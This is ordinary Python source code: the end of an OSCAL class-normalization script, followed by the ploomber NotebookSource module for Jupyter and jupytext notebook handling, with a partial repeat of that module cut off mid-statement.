= [] for line in c.lines: if 'title=' not in line and 'description=' not in line: for item in changes: if item[0] in line: line = replace_token(line, item[0], item[1]) lines.append(line) classes[i].lines = lines # make sure class definition has correct name paren = lines[0].find('(') class_name = classes[i].name if paren > 0: class_name = lines[0][len('class '):paren] classes[i].name = class_name # need to regenerate body since tokens changed classes[i].generate_body_text() return classes def apply_changes_to_classes(file_classes, changes, com_names): """Apply changes to dict of classes organized by file.""" for fc in file_classes.items(): classes = fc[1] for i, c in enumerate(classes): lines = [] for line in c.lines: if 'title=' not in line and 'description=' not in line: for item in changes.items(): if item[0] not in line: continue new_name = item[1] # if not in common then need to add common. to common names if fc[0] != 'common' and new_name in com_names: tentative_name = 'common.' + new_name if tentative_name not in line: new_name = tentative_name line = replace_token(line, item[0], new_name) lines.append(line) classes[i].lines = lines # class name may have been replaced by change - so update with new name paren = lines[0].find('(') class_name = classes[i].name if paren > 0: class_name = lines[0][len('class '):paren] classes[i].name = class_name classes[i].generate_body_text() file_classes[fc[0]] = classes return file_classes def reorder_and_dump_as_python(file_classes): """Reorder the files and dump.""" for item in file_classes.items(): ordered, forward_refs = reorder_classes(item[0], item[1]) write_oscal(ordered, forward_refs, item[0]) def find_full_changes(file_classes): """Find all name changes and what files made them.""" changes = {} com_names = [] for c in file_classes['common']: changes[c.unique_name] = c.name com_names.append(c.name) for fstem in fstems: for c in file_classes[fstem]: changes[c.unique_name] = c.name return changes, com_names def kill_min_items(classes): """Kill all references to min_items=1.""" # NOTE! This changes all constr list to normal List for i, c in enumerate(classes): for j, line in enumerate(c.lines): c.lines[j] = line.replace(', min_items=1', '') classes[i] = c return classes def fix_include_all(classes): """Replace [IncludeAll] with [Any].""" for i, c in enumerate(classes): for j, line in enumerate(c.lines): c.lines[j] = line.replace('[IncludeAll]', '[Any]') classes[i] = c return classes def strip_file(classes): """Given set of classes from a file strip all names and apply changes to references in the bodies.""" classes = strip_prefixes(classes) changes = [] for c in classes: changes.append((c.original_name, c.name)) return apply_changes_to_class_list(classes, changes) def _strip_all_files(file_classes): for item in file_classes.items(): stem = item[0] if item[0] != 'common': file_classes[stem] = strip_file(file_classes[stem]) return file_classes def update_refs_per_file(classes): """Change all refs to the _ versions.""" changes = [] for c in classes: if '_' in c.name: changes.append((c.name.split('_')[1], c.name)) classes = apply_changes_to_class_list(classes, changes) return classes def normalize_files(): """Clean up classes to minimise cross reference.""" all_classes = load_all_classes() # kill the min_items immediately uc = kill_min_items(all_classes) # fix IncludeAll that isn't defined properly in schema uc = fix_include_all(all_classes) # organize in a dict with filename as key file_classes = _list_to_file_classes(all_classes) # strip all names and bodies file_classes = _strip_all_files(file_classes) # convert dict to single list of classes with expected duplicates uc = _file_classes_to_list(file_classes, True) # find all unique classes based on body text uc = find_unique_classes(uc) # find classes with same name and different bodies - and modify class names with _ # bodies are not changed uc = fix_clashes(uc) # now have unique list of classes with unique names # some names have _ in them to be removed later # make sure all classes have the proper unique name set at this point for c in uc: c.unique_name = c.name # some class names have _ in them, so change refs in each file to include the _ uc = update_refs_per_file(uc) # split the classes based on current name and whether referenced by only one file file_classes = split_classes(uc) # find all changes from old name to new changes, com_names = find_full_changes(file_classes) # now apply all the changes to the class bodies file_classes = apply_changes_to_classes(file_classes, changes, com_names) # re-order them in each file and dump reorder_and_dump_as_python(file_classes) # this will leave files with raw formatting and make code-format must be run separately if __name__ == '__main__': """Main invocation.""" normalize_files()
""" On languages and kernels ------------------------ NotebookSource represents source code in a Jupyter notebook format (language agnostic). Apart from .ipynb, we also support any other extension supported by jupytext. Given a notebook, we have to know which language it is written in to extract upstream/product variables (though this only happens when the option of extracting dependencies automatically is on), we also have to determine the Jupyter kernel to use (this is always needed). The unequivocal place to store this information is in the notebook metadata section, but given that we advocate for the use of scripts (converted to notebooks via jupytext), they most likely won't contain metadata (metadata saving is turned off by default in jupytext), so we have to infer this ourselves. To make things more complex, jupytext adds its own metadata section but we are ignoring that for now. Given that there are many places where this information might be stored, we have a few rules to automatically determine language and kernel given a script/notebook. """ from functools import wraps import ast from pathlib import Path import warnings from contextlib import redirect_stdout from io import StringIO from copy import deepcopy # papermill is importing a deprecated module from pyarrow with warnings.catch_warnings(): warnings.simplefilter('ignore', FutureWarning) from papermill.parameterize import parameterize_notebook import click import nbformat import jupytext from jupytext import cli as jupytext_cli from jupytext.formats import long_form_one_format, short_form_one_format from jupytext.config import JupytextConfiguration import parso from ploomber.exceptions import (SourceInitializationError, MissingParametersCellError) from ploomber.placeholders.placeholder import Placeholder from ploomber.util import requires from ploomber.sources.abc import Source from ploomber.sources.nb_utils import find_cell_with_tag, find_cell_with_tags from ploomber.static_analysis.extractors import extractor_class_for_language from ploomber.static_analysis.pyflakes import check_notebook from ploomber.sources import docstring from ploomber.io import pretty_print def _jupytext_fmt(primitive, extension): """ Determine the jupytext fmt string to use based on the content and extension """ if extension != 'ipynb': fmt, _ = jupytext.guess_format(primitive, f'.{extension}') fmt_final = f'{extension}:{fmt}' else: fmt_final = '.ipynb' return fmt_final # TODO: we should unit test that this function is called, as opposed to vanilla # .read_text def _read_primitive(path): """ We read using the UTF-8 instead of the default encoding since notebooks are always stored in UTF-8. We can see this in nbformat, which always reads as UTF-8: https://github.com/jupyter/nbformat/blob/df63593b64a15ee1c37b522973c39e8674f93c5b/nbformat/__init__.py#L125 Scripts are a different story since they may have other encodings, however, modern editors have UTF-8 as default (example: VSCode https://docs.microsoft.com/en-us/powershell/scripting/dev-cross-plat/vscode/understanding-file-encoding?view=powershell-7.2#configuring-vs-code) so it's safer to use UTF-8 than the default encoding. jupytext already does this: https://github.com/mwouts/jupytext/issues/896 """ return Path(path).read_text(encoding='utf-8') def _get_last_cell(nb): """ Get last cell, ignores cells with empty source (unless the notebook only has one cell and it's empty) """ # iterate in reverse order for idx in range(-1, -len(nb.cells) - 1, -1): cell = nb.cells[idx] # only return it if it has some code if cell['source'].strip(): return cell # otherwise return the first cell return nb.cells[0] def _get_cell_suggestion(nb): format_name = nb.metadata.get('jupytext', {}).get('text_representation', {}).get('format_name') preamble = 'Add a new cell with your code' if format_name == 'light': message = f'{preamble}:\n' + """ # + tags=["parameters"] # your parameters here... # - # + # your code here... # - """ elif format_name == 'percent': message = f'{preamble}:\n' + """ # %% tags=["parameters"] # your parameters here... # %% # your code here... """ else: message = preamble + '.' return message def requires_path(func): """ Checks if NotebookSource instance was initialized from a file, raises an error if not """ @wraps(func) def wrapper(self, *args, **kwargs): if self._path is None: raise ValueError(f'Cannot use {func.__name__!r} if notebook was ' 'not initialized from a file') return func(self, *args, **kwargs) return wrapper class NotebookSource(Source): """ A source object representing a jupyter notebook (or any format supported by jupytext) Parameters ---------- hot_reload : bool, optional Makes the notebook always read the file before rendering kernelspec_name : str, optional Which kernel to use for executing the notebook, it overrides any existing kernelspec metadata in the notebook. If the notebook does not have kernelspec info, this parameter is required. Defaults to None. To see which kernelspecs are available run "jupyter kernelspec list" check_if_kernel_installed : bool, optional Check if the kernel is installed during initization Notes ----- The render method prepares the notebook for execution: it adds the parameters and it makes sure kernelspec is defined """ @requires([ 'parso', 'pyflakes', 'jupytext', 'nbformat', 'papermill', 'jupyter_client' ]) def __init__(self, primitive, hot_reload=False, ext_in=None, kernelspec_name=None, static_analysis='regular', check_if_kernel_installed=True): # any non-py file must first be converted using jupytext, we need # that representation for validation, if input is already a .py file # do not convert. If passed a string, try to guess format using # jupytext. We also need ipynb representation for .develop(), # but do lazy loading in case we don't need both self._primitive = primitive self._check_if_kernel_installed = check_if_kernel_installed # this happens if using SourceLoader if isinstance(primitive, Placeholder): self._path = primitive.path self._primitive = str(primitive) elif isinstance(primitive, str): self._path = None self._primitive = primitive elif isinstance(primitive, Path): self._path = primitive if primitive.is_dir(): raise SourceInitializationError( f'Failed to initialize {str(primitive)!r}. ' 'Expected a file, got a directory.' + _suggest_ploomber_scaffold_is_dir()) if not primitive.exists(): raise SourceInitializationError( f'Failed to initialize {str(primitive)!r}. ' 'File does not exist.' + _suggest_ploomber_scaffold_missing_file()) self._primitive = _read_primitive(primitive) else: raise TypeError('Notebooks must be initialized from strings, ' 'Placeholder or pathlib.Path, got {}'.format( type(primitive))) static_analysis_vals = {'disable', 'regular', 'strict'} if static_analysis not in static_analysis_vals: raise ValueError(f'{static_analysis!r} is not a ' "valid 'static_analysis' value, choose one from: " f'{pretty_print.iterable(static_analysis_vals)}') self.static_analysis = static_analysis self._kernelspec_name = kernelspec_name self._hot_reload = hot_reload # TODO: validate ext_in values and extensions if self._path is None and hot_reload: raise ValueError('hot_reload only works in the notebook was ' 'loaded from a file') if self._path is not None and ext_in is None: self._ext_in = self._path.suffix[1:] elif self._path is None and ext_in is None: if Path(self._primitive).exists(): path = str(self._primitive) raise ValueError( f'The file {path!r} you passed looks like ' 'a path to a file. Perhaps you meant passing a ' 'pathlib.Path object? Example:\n\n' 'from pathlib import Path\n' f'NotebookRunner(Path({path!r}))') else: raise ValueError( '"ext_in" cannot be None if the notebook is ' 'initialized from a string. Either pass ' 'a pathlib.Path object with the notebook file ' 'location or pass the source code as string ' 'and include the "ext_in" parameter') elif self._path is not None and ext_in is not None: raise ValueError('"ext_in" must be None if notebook is ' 'initialized from a pathlib.Path object') elif self._path is None and ext_in is not None: self._ext_in = ext_in # try to determine language based on extension, though this test # might be inconclusive if dealing with a ipynb file, though we only # use this to determine the appropriate jupyter kernel when # initializing from a string, when initializing from files, the # extension is used to determine the kernel self._language = determine_language(self._ext_in) self._loc = None self._params = None self._nb_str_unrendered = None self._nb_obj_unrendered = None self._nb_str_rendered = None self._nb_obj_rendered = None # this will raise an error if kernelspec_name is invalid self._read_nb_str_unrendered() self._post_init_validation(str(self._primitive)) @property def primitive(self): if self._hot_reload: self._primitive = _read_primitive(self._path) return self._primitive def render(self, params): """Render notebook (fill parameters using papermill) """ self._params = json_serializable_params(params) self._render() def _render(self): # _read_nb_str_unrendered uses hot_reload, this ensures we always get # the latest version _, nb = self._read_nb_str_unrendered() if 'parameters' in _get_last_cell(nb).metadata.get('tags', []): cell_suggestion = _get_cell_suggestion(nb) kind = 'notebook' if self._ext_in == 'ipynb' else 'script' raise SourceInitializationError( f'Error processing {str(self._path)!r}: the last cell ' f'in the {kind} is the parameters cell. {cell_suggestion}') # this is needed for parameterize_notebook to work for cell in nb.cells: if not hasattr(cell.metadata, 'tags'): cell.metadata['tags'] = [] nb.metadata['papermill'] = dict() # NOTE: we use parameterize_notebook instead of execute_notebook # with the prepare_only option because the latter adds a "papermill" # section on each cell's metadata, which makes it too verbose when # using NotebookRunner.develop() when the source is script (each cell # will have an empty "papermill" metadata dictionary) nb = parameterize_notebook(nb, self._params) # delete empty tags to prevent cluttering the notebooks for cell in nb.cells: if not len(cell.metadata['tags']): cell.metadata.pop('tags') self._nb_str_rendered = nbformat.writes(nb) self._post_render_validation() def _read_nb_str_unrendered(self): """ Returns the notebook representation (JSON string), this is the raw source code passed, does not contain injected parameters. Adds kernelspec info if not present based on the kernelspec_name, this metadata is required for papermill to know which kernel to use. An exception is raised if we cannot determine kernel information. """ # hot_reload causes to always re-evalaute the notebook representation if self._nb_str_unrendered is None or self._hot_reload: # this is the notebook node representation nb = _to_nb_obj( self.primitive, ext=self._ext_in, # passing the underscored version # because that's the only one available # when this is initialized language=self._language, kernelspec_name=self._kernelspec_name, check_if_kernel_installed=self._check_if_kernel_installed, path=self._path) # if the user injected cells manually (with ploomber nb --inject) # the source will contain the injected cell, remove it because # it should not be considered part of the source code self._nb_obj_unrendered = _cleanup_rendered_nb(nb, print_=False) # get the str representation. always write from nb_obj, even if # this was initialized with a ipynb file, nb_obj contains # kernelspec info self._nb_str_unrendered = nbformat.writes( self._nb_obj_unrendered, version=nbformat.NO_CONVERT) return self._nb_str_unrendered, self._nb_obj_unrendered def _post_init_validation(self, value): """ Validate notebook after initialization (run pyflakes to detect syntax errors) """ # NOTE: what happens if I pass source code with errors to parso? # maybe we don't need to use pyflakes after all # we can also use compile. can pyflakes detect things that # compile cannot? params_cell, _ = find_cell_with_tag(self._nb_obj_unrendered, 'parameters') if params_cell is None: loc = ' "{}"'.format(self.loc) if self.loc else '' msg = ('Notebook{} does not have a cell tagged ' '"parameters"'.format(loc)) if self.loc and Path(self.loc).suffix == '.py': msg += """. Add a cell at the top like this: # %% tags=["parameters"] upstream = None product = None Go to: https://ploomber.io/s/params for more information """ if self.loc and Path(self.loc).suffix == '.ipynb': msg += ('. Add a cell at the top and tag it as "parameters". ' 'Go to the next URL for ' 'details: https://ploomber.io/s/params') raise MissingParametersCellError(msg) def _post_render_validation(self): """ Validate params passed against parameters in the notebook """ # NOTE: maybe static_analysis = off should not turn off everything # but only warn # strict mode: raise and check signature # regular mode: _check_notebook called in NotebookRunner.run if self.static_analysis == 'strict': self._check_notebook(raise_=True, check_signature=True) else: # otherwise, only warn on unused parameters _warn_on_unused_params(self._nb_obj_unrendered, self._params) def _check_notebook(self, raise_, check_signature): if self.static_analysis and self.language == 'python': # warn if errors (e.g., undeclared variables, syntax errors) check_notebook(self._nb_str_to_obj(self._nb_str_rendered), self._params, filename=self._path or 'notebook', raise_=raise_, check_signature=check_signature) @property def doc(self): """ Returns notebook docstring parsed either from a triple quoted string in the top cell or a top markdown markdown cell """ return docstring.extract_from_nb(self._nb_obj_unrendered) @property def loc(self): return self._path @property def name(self): # filename without extension(e.g., plot.py -> plot) if self._path: return self._path.stem @property def nb_str_rendered(self): """ Returns the notebook (as a string) with parameters injected, hot reloadig if necessary """ if self._nb_str_rendered is None: raise RuntimeError('Attempted to get location for an unrendered ' 'notebook, render it first') if self._hot_reload: self._render() return self._nb_str_rendered @property def nb_obj_rendered(self): """ Returns the notebook (as an objet) with parameters injected, hot reloadig if necessary """ if self._nb_obj_rendered is None: # using self.nb_str_rendered triggers hot reload if needed self._nb_obj_rendered = self._nb_str_to_obj(self.nb_str_rendered) return self._nb_obj_rendered def __str__(self): # reload if empty or hot_reload=True self._read_nb_str_unrendered() # FIXME: this should ignore changes to the markdown cells return '\n'.join([c.source for c in self._nb_obj_unrendered.cells]) def __repr__(self): if self.loc is not None: return "{}('{}')".format(type(self).__name__, self.loc) else: return "{}(loaded from string)".format(type(self).__name__) @property def variables(self): raise NotImplementedError @property def extension(self): # this can be Python, R, Julia, etc. We are handling them the same, # for now, no normalization can be done. # One approach is to use the ext if loaded from file, otherwise None return None # FIXME: add this to the abstract class, probably get rid of "extension" # since it's not informative (ipynb files can be Python, R, etc) @property def language(self): """ Notebook Language (Python, R, etc), this is a best-effort property, can be None if we could not determine the language """ if self._language is None: self._read_nb_str_unrendered() try: # make sure you return "r" instead of "R" return (self._nb_obj_unrendered.metadata.kernelspec.language. lower()) except AttributeError: return None else: return self._language def _nb_str_to_obj(self, nb_str): return nbformat.reads(nb_str, as_version=nbformat.NO_CONVERT) def _get_parameters_cell(self): self._read_nb_str_unrendered() cell, _ = find_cell_with_tag(self._nb_obj_unrendered, tag='parameters') return cell.source def extract_upstream(self): extractor_class = extractor_class_for_language(self.language) return extractor_class(self._get_parameters_cell()).extract_upstream() def extract_product(self): extractor_class = extractor_class_for_language(self.language) return extractor_class(self._get_parameters_cell()).extract_product() @requires_path def save_injected_cell(self): """ Inject cell, overwrite the source file (and any paired files) """ fmt_ = _jupytext_fmt(self._primitive, self._ext_in) # add metadata to flag that the cell was injected manually recursive_update( self.nb_obj_rendered, dict(metadata=dict(ploomber=dict(injected_manually=True)))) # Are we updating a text file that has a metadata filter? If so, # add ploomber as a section that must be stored if (self.nb_obj_rendered.metadata.get( 'jupytext', {}).get('notebook_metadata_filter') == '-all'): recursive_update( self.nb_obj_rendered, dict(metadata=dict(jupytext=dict( notebook_metadata_filter='ploomber,-all')))) # overwrite jupytext.write(self.nb_obj_rendered, self._path, fmt=fmt_) # overwrite all paired files for path, fmt_ in iter_paired_notebooks(self.nb_obj_rendered, fmt_, self._path.stem): jupytext.write(self.nb_obj_rendered, fp=path, fmt=fmt_) @requires_path def remove_injected_cell(self): """ Delete injected cell, overwrite the source file (and any paired files) """ nb_clean = _cleanup_rendered_nb(self._nb_obj_unrendered) # remove metadata recursive_update( nb_clean, dict(metadata=dict(ploomber=dict(injected_manually=None)))) fmt_ = _jupytext_fmt(self._primitive, self._ext_in) # overwrite jupytext.write(nb_clean, self._path, fmt=fmt_) # overwrite all paired files for path, fmt_ in iter_paired_notebooks(self._nb_obj_unrendered, fmt_, self._path.stem): jupytext.write(nb_clean, fp=path, fmt=fmt_) @requires_path def format(self, fmt, entry_point): """Change source format Returns ------- str The path if the extension changed, None otherwise """ nb_clean = _cleanup_rendered_nb(self._nb_obj_unrendered) ext_file = self._path.suffix ext_format = long_form_one_format(fmt)['extension'] extension_changed = ext_file != ext_format if extension_changed: if Path(entry_point).is_file(): path = self._path.with_suffix(ext_format) Path(self._path).unlink() modified_entry = Path(entry_point).read_text() main_file = f'{self.name}{ext_file}' if main_file in modified_entry: modified_entry = modified_entry.replace( main_file, f'{self.name}{ext_format}') Path(entry_point).write_text(modified_entry) else: click.secho( f'{main_file} does not appear in entry-point' f'please edit manually\n', fg='yellow') path = self._path else: click.secho( "The entry-point is not a valid file, please" " update the pipeline file extensions manually\n", fg='yellow') path = self._path else: path = self._path jupytext.write(nb_clean, path, fmt=fmt) return path if extension_changed else None @requires_path def pair(self, base_path): """Pairs with an ipynb file """ # TODO: add unit test if self._ext_in == 'ipynb': raise ValueError( 'pairing only works with .py files, got .ipynb. ' 'Yoy may convert the .ipynb to .py and try again.') fmt, _ = jupytext.guess_format(self._primitive, f'.{self._ext_in}') fmt_ = f'{self._ext_in}:{fmt}' # mute jupytext's output with redirect_stdout(StringIO()): jupytext_cli.jupytext(args=[ '--set-formats', f'{base_path}//ipynb,{fmt_}', str(self._path) ]) @requires_path def sync(self): """Pairs with and ipynb file """ # mute jupytext's output with redirect_stdout(StringIO()): jupytext_cli.jupytext(args=['--sync', str(self._path)]) def json_serializable_params(params): # papermill only allows JSON serializable parameters # convert Params object to dict params = params.to_dict() params['product'] = params['product'].to_json_serializable() if params.get('upstream'): params['upstream'] = params['upstream'].to_json_serializable() return params def _to_nb_obj(source, language, ext=None, kernelspec_name=None, check_if_kernel_installed=True, path=None): """ Convert to jupyter notebook via jupytext, if the notebook does not contain kernel information and the user did not pass a kernelspec_name explicitly, we will try to infer the language and select a kernel appropriately. If a valid kernel is found, it is added to the notebook. If none of this works, an exception is raised. If also converts the code string to its notebook node representation, adding kernel data accordingly. Parameters ---------- source : str Jupyter notebook (or jupytext compatible formatted) document language : str Programming language path : str, default=None Script/notebook path. If not None, it's used to throw an informative error if the notebook fails to load Returns ------- nb Notebook object Raises ------ RenderError If the notebook has no kernelspec metadata and kernelspec_name is None. A notebook without kernelspec metadata will not display in jupyter notebook correctly. We have to make sure all notebooks have this. """ import jupytext # let jupytext figure out the format try: nb = jupytext.reads(source, fmt=ext) except Exception as e: what = 'notebook' if ext == 'ipynb' else 'script' err = f'Failed to read {what}' if path is not None: err += f' from {str(path)!r}' raise SourceInitializationError(err) from e # NOTE: I can add the cell with parameters here, but what happens if # extract_upstream is false? would that be a problem? check_nb_kernelspec_info(nb, kernelspec_name, ext, language, check_if_installed=check_if_kernel_installed) return nb def check_nb_kernelspec_info(nb, kernelspec_name, ext, language, check_if_installed=True): """Make sure the passed notebook has kernel info Parameters ---------- check_if_installed : bool Also check if the kernelspec is installed, nb.metadata.kernelspec to be replaced by whatever information jupyter returns when requesting the kernelspec """ import jupyter_client kernel_name = determine_kernel_name(nb, kernelspec_name, ext, language) # cannot keep going if we don't have the kernel name if kernel_name is None: raise SourceInitializationError( 'Notebook does not contain kernelspec metadata and ' 'kernelspec_name was not specified, either add ' 'kernelspec info to your source file or specify ' 'a kernelspec by name. To see list of installed kernels run ' '"jupyter kernelspec list" in the terminal (first column ' 'indicates the name). Python is usually named "python3", ' 'R usually "ir"') if check_if_installed: kernelspec = jupyter_client.kernelspec.get_kernel_spec(kernel_name) nb.metadata.kernelspec = { "display_name": kernelspec.display_name, "language": kernelspec.language, "name": kernel_name } else: if 'metadata' not in nb: nb['metadata'] = dict() if 'kernelspec' not in nb['metadata']: nb['metadata']['kernelspec'] = dict() # we cannot ask jupyter, so we fill this in ourselves nb.metadata.kernelspec = { "display_name": 'R' if kernel_name == 'ir' else 'Python 3', "language": 'R' if kernel_name == 'ir' else 'python', "name": kernel_name } def determine_kernel_name(nb, kernelspec_name, ext, language): """ Determines the kernel name by using the following data (returns whatever gives kernel info first): 1) explicit kernel from the user 2) notebook's metadata 3) file extension 4) language 5) best guess """ # explicit kernelspec name if kernelspec_name is not None: return kernelspec_name # use metadata info try: return nb.metadata.kernelspec.name except AttributeError: pass # use language from extension if passed, otherwise use language variable if ext: language = determine_language(ext) lang2kernel = {'python': 'python3', 'r': 'ir'} if language in lang2kernel: return lang2kernel[language] # nothing worked, try to guess if it's python... is_python_ = is_python(nb) if is_python_: return 'python3' else: return None def inject_cell(model, params): """Inject params (by adding a new cell) to a model Notes ----- A model is different than a notebook: https://jupyter-notebook.readthedocs.io/en/stable/extending/contents.html """ nb = nbformat.from_dict(model['content']) # we must ensure nb has kernelspec info, otherwise papermill will fail to # parametrize ext = model['name'].split('.')[-1] check_nb_kernelspec_info(nb, kernelspec_name=None, ext=ext, language=None) # papermill adds a bunch of things before calling parameterize_notebook # if we don't add those things, parameterize_notebook breaks # https://github.com/nteract/papermill/blob/0532d499e13e93d8990211be33e9593f1bffbe6c/papermill/iorw.py#L400 if not hasattr(nb.metadata, 'papermill'): nb.metadata['papermill'] = { 'parameters': dict(), 'environment_variables': dict(), 'version': None, } for cell in nb.cells: if not hasattr(cell.metadata, 'tags'): cell.metadata['tags'] = [] params = json_serializable_params(params) comment = ('This cell was injected automatically based on your stated ' 'upstream dependencies (cell above) and pipeline.yaml ' 'preferences. It is temporary and will be removed when you ' 'save this notebook') model['content'] = parameterize_notebook(nb, params, report_mode=False, comment=comment) def _cleanup_rendered_nb(nb, print_=True): """ Cleans up a rendered notebook object. Removes cells with tags: injected-parameters, debugging-settings, and metadata injected by papermill """ out = find_cell_with_tags(nb, ['injected-parameters', 'debugging-settings']) if print_: for key in out.keys(): print(f'Removing {key} cell...') idxs = set(cell['index'] for cell in out.values()) nb['cells'] = [ cell for idx, cell in enumerate(nb['cells']) if idx not in idxs ] # papermill adds "tags" to all cells that don't have them, remove them # if they are empty to avoid cluttering the script for cell in nb['cells']: if 'tags' in cell.get('metadata', {}): if not len(cell['metadata']['tags']): del cell['metadata']['tags'] return nb def is_python(nb): """ Determine if the notebook is Python code for a given notebook object, look for metadata.kernelspec.language first, if not defined, try to guess if it's Python, it's conservative and it returns False if the code is valid Python but contains (<-), in which case it's much more likely to be R """ is_python_ = None # check metadata first try: language = nb.metadata.kernelspec.language except AttributeError: pass else: is_python_ = language == 'python' # no language defined in metadata, check if it's valid python if is_python_ is None: code_str = '\n'.join([c.source for c in nb.cells]) try: ast.parse(code_str) except SyntaxError: is_python_ = False else: # there is a lot of R code which is also valid Python code! So # let's # run a quick test. It is very unlikely to have "<-" in Python ( # {less than} {negative} but extremely common {assignment} if '<-' not in code_str: is_python_ = True # inconclusive test... if is_python_ is None: is_python_ = False return is_python_ def determine_language(extension): """ A function to determine programming language given file extension, returns programming language name (all lowercase) if could be determined, None if the test is inconclusive """ if extension.startswith('.'): extension = extension[1:] mapping = {'py': 'python', 'r': 'r', 'R': 'r', 'Rmd': 'r', 'rmd': 'r'} # ipynb can be many languages, it must return None return mapping.get(extension) def recursive_update(target, update): """Recursively update a dictionary. Taken from jupytext.header """ for key in update: value = update[key] if value is None: # remove if it exists target.pop(key, None) elif isinstance(value, dict): target[key] = recursive_update(target.get(key, {}), value) else: target[key] = value return target def parse_jupytext_format(fmt, name): """ Parse a jupytext format string (such as notebooks//ipynb) and return the path to the file and the extension """ fmt_parsed = long_form_one_format(fmt) path = Path(fmt_parsed['prefix'], f'{name}{fmt_parsed['extension']}') del fmt_parsed['prefix'] return path, short_form_one_format(fmt_parsed) def iter_paired_notebooks(nb, fmt_, name): formats = nb.metadata.get('jupytext', {}).get('formats', '') if not formats: return formats = formats.split(',') formats.remove(fmt_) # overwrite all paired files for path, fmt_current in (parse_jupytext_format(fmt, name) for fmt in formats): yield path, fmt_current def _nb2codestr(nb): return '\n'.join([c.source for c in nb.cells if c.cell_type == 'code']) def _warn_on_unused_params(nb, params): nb = deepcopy(nb) _, idx = find_cell_with_tag(nb, 'parameters') del nb.cells[idx] code = _nb2codestr(nb) # NOTE: if there a syntax error we cannot accurately check this m = parso.parse(code) names = set(m.get_used_names()) # remove product since it may not be required # FIXME: maybe only remove it if it's a dictionary with >2 keys unused = set(params) - names - {'product'} if unused: warnings.warn('These parameters are not used in the ' f'task\'s source code: {pretty_print.iterable(unused)}') def add_parameters_cell(path, extract_upstream, extract_product): """ Add parameters cell to a script/notebook in the given path, overwrites the original file """ source = '' if extract_upstream: source += """\ # declare a list tasks whose products you want to use as inputs upstream = None """ if extract_product: source += """\ # declare a dictionary with the outputs of this task product = None """ c = JupytextConfiguration() c.notebook_metadata_filter c.cell_metadata_filter = 'all' nb = jupytext.read(path) new_cell = nbformat.v4.new_code_cell(source, metadata={'tags': ['parameters']}) nb.cells.insert(0, new_cell) jupytext.write(nb, path, config=c) def _suggest_ploomber_scaffold_missing_file(): if Path('pipeline.yaml').is_file(): return '\nTo create it, run: ploomber scaffold' else: return '' def _suggest_ploomber_scaffold_is_dir(): if Path('pipeline.yaml').is_file(): return ('\nTo create it, delete the directory, ' 'then run: ploomber scaffold') else: return ''
""" On languages and kernels ------------------------ NotebookSource represents source code in a Jupyter notebook format (language agnostic). Apart from .ipynb, we also support any other extension supported by jupytext. Given a notebook, we have to know which language it is written in to extract upstream/product variables (though this only happens when the option of extracting dependencies automatically is on), we also have to determine the Jupyter kernel to use (this is always needed). The unequivocal place to store this information is in the notebook metadata section, but given that we advocate for the use of scripts (converted to notebooks via jupytext), they most likely won't contain metadata (metadata saving is turned off by default in jupytext), so we have to infer this ourselves. To make things more complex, jupytext adds its own metadata section but we are ignoring that for now. Given that there are many places where this information might be stored, we have a few rules to automatically determine language and kernel given a script/notebook. """ from functools import wraps import ast from pathlib import Path import warnings from contextlib import redirect_stdout from io import StringIO from copy import deepcopy # papermill is importing a deprecated module from pyarrow with warnings.catch_warnings(): warnings.simplefilter('ignore', FutureWarning) from papermill.parameterize import parameterize_notebook import click import nbformat import jupytext from jupytext import cli as jupytext_cli from jupytext.formats import long_form_one_format, short_form_one_format from jupytext.config import JupytextConfiguration import parso from ploomber.exceptions import (SourceInitializationError, MissingParametersCellError) from ploomber.placeholders.placeholder import Placeholder from ploomber.util import requires from ploomber.sources.abc import Source from ploomber.sources.nb_utils import find_cell_with_tag, find_cell_with_tags from ploomber.static_analysis.extractors import extractor_class_for_language from ploomber.static_analysis.pyflakes import check_notebook from ploomber.sources import docstring from ploomber.io import pretty_print def _jupytext_fmt(primitive, extension): """ Determine the jupytext fmt string to use based on the content and extension """ if extension != 'ipynb': fmt, _ = jupytext.guess_format(primitive, f'.{extension}') fmt_final = f'{extension}:{fmt}' else: fmt_final = '.ipynb' return fmt_final # TODO: we should unit test that this function is called, as opposed to vanilla # .read_text def _read_primitive(path): """ We read using the UTF-8 instead of the default encoding since notebooks are always stored in UTF-8. We can see this in nbformat, which always reads as UTF-8: https://github.com/jupyter/nbformat/blob/df63593b64a15ee1c37b522973c39e8674f93c5b/nbformat/__init__.py#L125 Scripts are a different story since they may have other encodings, however, modern editors have UTF-8 as default (example: VSCode https://docs.microsoft.com/en-us/powershell/scripting/dev-cross-plat/vscode/understanding-file-encoding?view=powershell-7.2#configuring-vs-code) so it's safer to use UTF-8 than the default encoding. jupytext already does this: https://github.com/mwouts/jupytext/issues/896 """ return Path(path).read_text(encoding='utf-8') def _get_last_cell(nb): """ Get last cell, ignores cells with empty source (unless the notebook only has one cell and it's empty) """ # iterate in reverse order for idx in range(-1, -len(nb.cells) - 1, -1): cell = nb.cells[idx] # only return it if it has some code if cell['source'].strip(): return cell # otherwise return the first cell return nb.cells[0] def _get_cell_suggestion(nb): format_name = nb.metadata.get('jupytext', {}).get('text_representation', {}).get('format_name') preamble = 'Add a new cell with your code' if format_name == 'light': message = f'{preamble}:\n' + """ # + tags=["parameters"] # your parameters here... # - # + # your code here... # - """ elif format_name == 'percent': message = f'{preamble}:\n' + """ # %% tags=["parameters"] # your parameters here... # %% # your code here... """ else: message = preamble + '.' return message def requires_path(func): """ Checks if NotebookSource instance was initialized from a file, raises an error if not """ @wraps(func) def wrapper(self, *args, **kwargs): if self._path is None: raise ValueError(f'Cannot use {func.__name__!r} if notebook was ' 'not initialized from a file') return func(self, *args, **kwargs) return wrapper class NotebookSource(Source): """ A source object representing a jupyter notebook (or any format supported by jupytext) Parameters ---------- hot_reload : bool, optional Makes the notebook always read the file before rendering kernelspec_name : str, optional Which kernel to use for executing the notebook, it overrides any existing kernelspec metadata in the notebook. If the notebook does not have kernelspec info, this parameter is required. Defaults to None. To see which kernelspecs are available run "jupyter kernelspec list" check_if_kernel_installed : bool, optional Check if the kernel is installed during initization Notes ----- The render method prepares the notebook for execution: it adds the parameters and it makes sure kernelspec is defined """ @requires([ 'parso', 'pyflakes', 'jupytext', 'nbformat', 'papermill', 'jupyter_client' ]) def __init__(self, primitive, hot_reload=False, ext_in=None, kernelspec_name=None, static_analysis='regular', check_if_kernel_installed=True): # any non-py file must first be converted using jupytext, we need # that representation for validation, if input is already a .py file # do not convert. If passed a string, try to guess format using # jupytext. We also need ipynb representation for .develop(), # but do lazy loading in case we don't need both self._primitive = primitive self._check_if_kernel_installed = check_if_kernel_installed # this happens if using SourceLoader if isinstance(primitive, Placeholder): self._path = primitive.path self._primitive = 